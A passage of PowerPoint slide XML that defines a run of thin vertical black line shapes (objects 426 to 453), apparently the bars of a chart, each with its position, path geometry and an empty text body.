        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="426" name="object 426"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6577897" y="5339795"/>
            <a:ext cx="0" cy="392605"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="198119">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="198093"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="427" name="object 427"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6577623" y="5342808"/>
            <a:ext cx="2517" cy="390088"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="196850">
                <a:moveTo>
                  <a:pt x="414" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="414" y="196573"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="object 428"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6605258" y="5316211"/>
            <a:ext cx="0" cy="416513"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="210185">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="209995"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="429" name="object 429"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6603599" y="5314827"/>
            <a:ext cx="2517" cy="417772"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="210819">
                <a:moveTo>
                  <a:pt x="349" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349" y="210693"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430" name="object 430"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6633163" y="5300123"/>
            <a:ext cx="0" cy="432872"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="218439">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="218113"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="431" name="object 431"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6632891" y="5301464"/>
            <a:ext cx="1258" cy="431612"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="217805">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="217436"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="432" name="object 432"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6661015" y="5279221"/>
            <a:ext cx="0" cy="454264"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="229235">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="228661"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433" name="object 433"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6658274" y="5280260"/>
            <a:ext cx="2517" cy="453006"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="228600">
                <a:moveTo>
                  <a:pt x="0" y="227860"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="227860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1244" y="228136"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="434" name="object 434"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6688921" y="5264720"/>
            <a:ext cx="0" cy="468106"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="236219">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="235978"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="435" name="object 435"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6688349" y="5267735"/>
            <a:ext cx="1258" cy="465589"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="234950">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="234457"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="object 436"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6716773" y="5235228"/>
            <a:ext cx="0" cy="498306"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="251460">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="250861"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437" name="object 437"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6716499" y="5236857"/>
            <a:ext cx="2517" cy="495789"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="250189">
                <a:moveTo>
                  <a:pt x="487" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="487" y="250039"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="438" name="object 438"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6744681" y="5192327"/>
            <a:ext cx="0" cy="541090"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="273050">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="272510"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="439" name="object 439"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6743022" y="5193958"/>
            <a:ext cx="2517" cy="538573"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="271780">
                <a:moveTo>
                  <a:pt x="349" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349" y="271687"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="object 440"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6772039" y="5169827"/>
            <a:ext cx="0" cy="563740"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="284480">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="283859"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="441" name="object 441"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6771767" y="5171972"/>
            <a:ext cx="1258" cy="561223"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="283210">
                <a:moveTo>
                  <a:pt x="273" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="273" y="282782"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="442" name="object 442"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6799891" y="5161784"/>
            <a:ext cx="0" cy="571290"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="288289">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="287918"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="443" name="object 443"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6797442" y="5162587"/>
            <a:ext cx="2517" cy="570032"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="287655">
                <a:moveTo>
                  <a:pt x="549" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="549" y="287518"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444" name="object 444"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6827797" y="5121029"/>
            <a:ext cx="0" cy="611557"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="308610">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="308489"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="445" name="object 445"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6827524" y="5120729"/>
            <a:ext cx="0" cy="612816"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="309244">
                <a:moveTo>
                  <a:pt x="0" y="308365"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="308641"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="object 446"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6855705" y="5100116"/>
            <a:ext cx="0" cy="632949"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="319405">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="319038"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="447" name="object 447"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6855431" y="5099537"/>
            <a:ext cx="2517" cy="632949"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="319405">
                <a:moveTo>
                  <a:pt x="549" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="549" y="319335"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="448" name="object 448"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6883557" y="5068486"/>
            <a:ext cx="0" cy="664408"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="335280">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="334998"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="449" name="object 449"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6882200" y="5067609"/>
            <a:ext cx="1258" cy="665666"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="335914">
                <a:moveTo>
                  <a:pt x="273" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="273" y="335447"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="450" name="object 450"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6911462" y="5022905"/>
            <a:ext cx="0" cy="709709"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="358139">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="357999"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="451" name="object 451"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6911190" y="5023409"/>
            <a:ext cx="1258" cy="709709"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="358139">
                <a:moveTo>
                  <a:pt x="273" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="273" y="357750"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="452" name="object 452"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6938823" y="5005734"/>
            <a:ext cx="0" cy="727326"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="367030">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="366670"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="453" name="object 453"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6936619" y="5004053"/>
            <a:ext cx="2517" cy="728584"/>
